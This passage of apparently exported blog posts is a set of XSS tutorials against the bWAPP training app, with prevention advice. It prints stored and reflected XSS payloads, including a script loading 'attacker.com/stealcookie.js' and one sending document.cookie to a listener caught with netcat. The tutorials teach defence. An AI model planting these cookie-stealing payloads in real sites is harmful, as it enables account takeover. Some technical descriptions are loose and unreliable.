This payload also gets stored in the database: if you go to \"<b>phpMyAdmin</b>\" and check the \"<b>visitors</b>\" table, you can see the stored payload.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_12.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">Because the payload is stored in the database, it will be executed again if you go back and return to the page.</font><br></div><div><br></div><div><b><font size=\"5\">How do we prevent this attack?</font></b><br></div><div><br></div><div><ol><li><font size=\"4\">User input in the HTTP header needs to be encoded, and developers can implement filters that eliminate any scripting tags.</font><br></li><li><font size=\"4\">In some cases, the X-XSS-Protection header can prevent some level of XSS (cross-site-scripting) attacks, as it’s an add-on to browsers that sanitizes HTML responses.<br></font></li></ol><div><font size=\"4\"><br></font></div></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Cross-Site-Scripting - Stored (Change Secret & Cookies)",
            "blog_id": "cross-site-scripting-stored-change-secret-and-cookies",
            "author": "Anshuman Pattnaik",
            "published_date": "2019-05-29T19:56:34.014386Z",
            "last_updated_date": "2021-06-06T10:40:07.818150Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/seo%20_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/small%20_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/large%20_thumbnail.png",
            "keywords": [
                "Stored XSS",
                "bWAPP",
                "Cookies"
            ],
            "highlights": "This is the demonstration of Stored Cross-Site-Scripting attack in Change Secret and Cookies and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.",
            "description": "<div><font size=\"4\">This is the demonstration of Stored Cross-Site-Scripting attack in Change Secret and Cookies and for this demo, I'll be using bWAPP which is a buggy web application and we can use to test various vulnerabilities in the web.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">bWAPP Official Link:- <a href=\"http://www.itsecgames.com/\"><font color=\"#dd4124\">http://www.itsecgames.com/</font></a></font></div><div><font size=\"4\"><br></font></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/yCj45YiMQyM\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">How to perform a Stored Cross-Site-Scripting attack in Change Secret?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_1.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (Change Secret)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_2.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As you can see from the above screenshot there is an input box to change the current user secret and if you go to the <b>phpMyAdmin </b>then you will find a secret column under \"<b>users</b>\" table.&nbsp;</font><span style=\"font-size: large;\">To test let’s enter one secret message \"</span><b style=\"font-size: large;\">Nice\"</b><span style=\"font-size: large;\">.</span></div><div><span style=\"font-size: large;\"><br></span></div><div><img 
src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_3.png\"><span style=\"font-size: large;\"><br></span></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot, the \"<b>secret</b>\" has been changed to \"<b>Nice</b>\". What's actually happening is that when you enter a new secret message, the form takes the secret message as input and also passes the user's login name in a hidden input field.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_4.png\"><font size=\"4\"><br></font></div><div><br></div><div><div><font size=\"4\">As you can see from the screenshot, the user's name is passed to the server in the hidden input field. Sending data in a hidden input field is always bad practice, because most of the time developers forget to validate these input fields, which makes it very easy for the attacker to inject malicious code into the application.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Now let's change the input type of this \"<b>hidden</b>\" field to \"<b>text</b>\". 
Right-click, choose \"<b>Inspect Element</b>\", go to the hidden input field, change the input type to text and hit enter.</font><br></div></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_5.png\"><br></div><div><br></div><div><font size=\"4\">As per the above screenshot, you can see the attacker changing the input type to text so that he can inject malicious code into the application.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_6.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As you can see from the above screenshot, the hidden input has changed to a text input box. Now let's enter the JavaScript payload into this input box.</font></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">\"<span class=\"token operator\">&gt;</span><span class=\"token operator\">&lt;</span>img src<span class=\"token operator\">=</span>x onerror<span class=\"token operator\">=</span><span class=\"token function\">alert</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&gt;</span></code></pre></div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_7.png\"><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_8.png\"><br></div><div><br></div><div><div><font size=\"4\">As you can see 
from the above screenshot, I am able to inject JavaScript code into the input box. To prevent this attack, avoid using hidden input fields where possible, and if you do use them, properly sanitize special characters; otherwise it’s very easy for an attacker to inject malicious code.</font></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>For more information</b><br></font></div><div><ul><li><font size=\"4\"><a href=\"https://portswigger.net/research/xss-in-hidden-input-fields\"><font color=\"#dd4124\">XSS in hidden input fields</font></a><br></font></li></ul><div><br></div></div><div><b style=\"\"><font size=\"5\">How to perform a Stored Cross-Site-Scripting attack in Cookies?</font></b><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_9.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (Cookies)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_10.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As per the above screenshot, you can see an interface that asks which type of movie you like; if you hit the <b>Like</b> button, the message \"<b>Thank you for making your choice!</b>\" appears.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_11.png\"><font size=\"4\"><br></font></div><div><font size=\"4\">Now let's intercept the request in Burp Suite so that we can see what’s going on in the 
background.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_12.png\"><font size=\"4\"><br></font></div><div><font size=\"4\">As per the above screenshot, we got the HTTP request, and as you can see, <b>movie_genre</b> is reflected in the Cookie header.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_13.png\"><font size=\"4\"><br></font></div><div><span style=\"font-size: large;\">As per the above screenshot, I'll pass a new movie type \"</span><b style=\"font-size: large;\">thriller</b><span style=\"font-size: large;\">\" and check whether it is reflected or not.</span><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_14.png\"><font size=\"4\"><br></font></div><div><div><font size=\"4\">As you can see, the movie type I passed is reflected in the Cookie header, so I was able to insert a new movie type into the parameter. With this vulnerability, an attacker is able to inject malicious code into the Cookie header. To prevent this attack, proper validation of the query parameter is required.</font></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>For more information</b><br></font></div><div><ul><li><b style=\"\"><a href=\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection\"><font color=\"#dd4124\">X-XSS-Protection</font></a></b><br></li></ul></div><div><font size=\"4\"><br></font></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Cross-Site-Scripting - Stored (Blog)",
            "blog_id": "cross-site-scripting-stored-blog",
            "author": "Anshuman Pattnaik",
            "published_date": "2019-05-28T19:56:24.836192Z",
            "last_updated_date": "2021-06-06T10:41:07.032689Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/large_thumbnail.png",
            "keywords": [
                "Stored XSS",
                "bWAPP",
                "WAF"
            ],
            "highlights": "When an attacker browsing a web application and found a vulnerability which allows him to embed an HTML tag into the input box and the embedded tag become a permanent item of that page and then the browser will parse this code every time whenever the page will get loaded.",
            "description": "<b><font size=\"5\">Introduction to Stored XSS</font></b><div><b><font size=\"5\"><br></font></b></div><div><div style=\"\"><font size=\"4\">When an attacker browsing a web application and found a vulnerability which allows him to embed an HTML tag into the input box and the embedded tag become a permanent item of that page and then the browser will parse this code every time whenever the page will get loaded.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">For example in a blogging website attacker found a vulnerability in the comment section and embed this comment.</font></div></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\"><b>Attacker's Comment</b>&nbsp;- \"<i>Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more\"</i><br></font></div><div style=\"\"><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token operator\">&lt;</span>script src<span class=\"token operator\">=</span><span class=\"token string\">\"http://attacker.com/stealcookie.js\"</span><span class=\"token operator\">&gt;</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">The \"<b>stealcookie.js</b>\" is designed to steal the cookie of the browser and as this file is hosted in some other site so that the attacker can able to access it remotely and when the user's account gets compromised then the attacker will have full control to the user account.&nbsp;</font><span style=\"font-size: large;\">But the user will have no idea at all what is happening in the background with this piece of 
comment.</span></div></div><div><br></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/BcBOyzxu6YA\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">Real World Stored XSS Attack</font></b></div><div><br></div><div><font size=\"4\"><b>MySpace</b> and <b>Tweetdeck</b> are the best examples of Stored XSS. As you may know, the JavaScript code the attacker injected caused serious damage to both of these websites, because once the code is injected, it gets executed again and again for whoever visits that webpage.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_1.png\"><font size=\"4\"><br></font></div><div><br></div><div><b><font size=\"5\">How to prevent Stored XSS attack?</font></b><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_2.png\"><br></div><div><br></div><div><div><font size=\"4\">To prevent any XSS attack, a Web Application Firewall (WAF) is the best solution to protect a web application.&nbsp;</font><span style=\"font-size: large;\">A WAF is an automation tool, designed with artificial intelligence and machine learning algorithms, that filters specific content of a web application, and it can prevent attacks such as XSS, SQL Injection, File inclusion and security misconfiguration.</span></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Whenever a user sends a request to the web server, the request first goes to the WAF, the WAF filters the request, and then the request is transferred to the web server.&nbsp;</font><span style=\"font-size: large;\">The same applies to the web server: when the web server sends the response to the user, 
first the response goes to the WAF, then the WAF filters the response, and then it is transferred to the user.</span><br></div></div><div><br></div><div><b><font size=\"5\">For more information</font></b></div><div><ul><li><font size=\"4\"><a href=\"https://en.wikipedia.org/wiki/Web_application_firewall\"><font color=\"#dd4124\"><b>Web application firewall</b></font></a></font><br></li><li><b><a href=\"https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/\"><font color=\"#dd4124\">What is a Web Application Firewall (WAF)?</font></a></b><br></li></ul></div><div><br></div><div><b><font size=\"5\">How to perform Stored XSS in a Blogging web application?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_3.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (Blog)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_4.png\"><font size=\"4\"><br></font></div><div><br></div><div><div><font size=\"4\">As you can see from the screenshot, it's a demo blogging application with an input box where a user can comment. To test it, let's enter the comment \"<b>Nice Blog</b>\" and hit submit.</font></div></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_5.png\"><br></div><div><br></div><div><div><font size=\"4\">As you can see from the screenshot, the comment gets posted and is stored in the database. 
So now let's enter the JavaScript payload to steal the browser cookie.</font></div></div><div><font size=\"4\"><br></font></div><div><b><font size=\"5\">Payload comment to steal the cookie</font></b><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token maybe-class-name\">Nice</span> <span class=\"token maybe-class-name\">Blog</span><span class=\"token operator\">!</span> a similar type <span class=\"token keyword\">of</span> blog <span class=\"token constant\">I</span> have also written but <span class=\"token keyword\">with</span> some <span class=\"token keyword\">new</span> <span class=\"token class-name\">content</span><span class=\"token punctuation\">,</span> please visit my site to read more</code></pre></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token operator\">&lt;</span>script src<span class=\"token operator\">=</span><span class=\"token string\">\"http://192.168.2.12:9000?cookie\"</span><span class=\"token operator\">+</span><span class=\"token dom variable\">document</span><span class=\"token punctuation\">.</span><span class=\"token property-access\">cookie</span><span class=\"token operator\">&gt;</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre></div><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_6.png\"><br></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot, the comment gets posted in the blog, and along with the comment I am also injecting the JavaScript code, 
and this is a <b>GET</b> request with a query parameter \"<b>cookie</b>\"; \"<b>document.cookie</b>\" fetches the current browser cookie. I'll fetch this request with the <a href=\"https://en.wikipedia.org/wiki/Netcat\"><font color=\"#dd4124\"><b>netcat</b> </font></a>command through a reverse shell.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_7.png\"><font size=\"4\"><br></font></div><div><br></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": " "
        },
        {
            "title": "Cross-site-Scripting - Reflected (phpMyAdmin & PHP_SELF)",
            "blog_id": "cross-site-scripting-reflected-phpMyAdmin-and-php_self",
            "author": "Anshuman Pattnaik",
            "published_date": "2019-05-27T19:56:16.165494Z",
            "last_updated_date": "2021-06-06T10:42:25.554377Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/large_thumbnail.png",
            "keywords": [
                "Reflected XSS",
                "bWAPP",
                "phpmyAdmin"
            ],
            "highlights": "This is the demonstration of Cross-Site-Scripting attack in phpMyAdmin and PHP_SELF and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.",
            "description": "<div><font size=\"4\">This is the demonstration of Cross-Site-Scripting attack in phpMyAdmin and PHP_SELF and for this demo, I'll be using bWAPP which is a buggy web application and we can use to test various vulnerabilities in the web.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">bWAPP Official Link:- <a href=\"http://www.itsecgames.com/\"><font color=\"#dd4124\">http://www.itsecgames.com/</font></a></font></div><div><br></div><div><br></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/qABCSgC4GWw\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">How to perform a Cross-Site Scripting attack in phpMyAdmin?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_1.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Reflected (phpMyAdmin)</b> from the drop-down menu and click Hack.</font><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_2.png\"><br></div><div><br></div><div><font size=\"4\">So this is a phpMyAdmin cross-site scripting bug and you can see the message here that</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\" language-js\">The phpMyAdmin version fails to validate BBcode tags in the error.php script! and HINT is \"CVE-2010–4480\"</pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">If you search this id on their website then you will find the details of this particular vulnerability. 
When I search for this id <b>(CVE-2010-4480)</b>, the search result shows that in version 3.3.8.1 a cross-site scripting vulnerability was found in phpMyAdmin files, and an attacker is able to inject JavaScript code in the URL parameter.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_3.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">For example, there was an XSS bug found in the db_central_columns.php file query parameter.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">http<span class=\"token operator\">:</span><span class=\"token operator\">/</span><span class=\"token operator\">/</span>localhost<span class=\"token operator\">/</span>phpmyadmin<span class=\"token operator\">/</span>db_central_columns<span class=\"token punctuation\">.</span><span class=\"token property-access\">php</span><span class=\"token operator\">?</span>total_rows<span class=\"token operator\">=</span><span class=\"token number\">0</span>\"<span class=\"token operator\">&gt;</span><span class=\"token operator\">&lt;</span>script<span class=\"token operator\">&gt;</span><span class=\"token function\">alert</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre></div><br></div><div><div><font size=\"4\">It was a major bug in phpMyAdmin, and with it an attacker can do serious damage to the database. 
But by now this bug has already been fixed in most phpMyAdmin versions.</font></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>For more information, please check the CVE report.</b></font></div><div><ul><li><a href=\"https://cve.circl.lu/cve/CVE-2010-4480\"><font color=\"#dd4124\"><b>CVE-2010-4480</b></font></a><br></li></ul></div><div><br></div><div><b><font size=\"5\">How to perform a Cross-Site Scripting attack in PHP_SELF?</font></b><br></div><div><b><font size=\"5\"><br></font></b></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_4.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Reflected (PHP_SELF)</b> from the drop-down menu and click Hack.</font><br></div><div><b><font size=\"5\"><br></font></b></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_5.png\"><b><font size=\"5\"><br></font></b></div><div><br></div><div><div><font size=\"4\">As you can see, here we get the same user interface again that we saw in the (GET &amp; POST) section - <a href=\"https://hackbotone.com/blog/cross-site-scripting-reflected-phpMyAdmin-and-php_self\"><font color=\"#dd4124\">Cross-site-Scripting — Reflected (GET &amp; POST)</font></a>. 
So let's enter a first name and last name; if they are reflected, then we can inject JavaScript code.</font></div></div><div><b><font size=\"5\"><br></font></b></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_6.png\"><b><font size=\"5\"><br></font></b></div><div><br></div><div><font size=\"4\">As you can see, the first name and last name are reflected on the webpage, so let's enter the JavaScript code.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token operator\">&lt;</span>script<span class=\"token operator\">&gt;</span><span class=\"token function\">alert</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre></div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_7.png\"><br></div><div><br></div><div><div><font size=\"4\">And as you can see, I am able to inject JavaScript code. A better way to prevent this attack is proper sanitization of special characters, which prevents this bug. And whenever you are developing a web application, please follow OWASP guidelines. 
That way you can at least reduce common vulnerabilities in websites.</font></div></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">For more information</font></b></div><div><ol><li><font size=\"4\"><font color=\"#dd4124\"><a href=\"https://www.owasp.org/index.php/Main_Page\"><font color=\"#dd4124\">OWASP Foundation</font></a></font></font><br></li></ol><div><font size=\"4\"><br></font></div></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span><br></div><div><br></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        }
    ]
}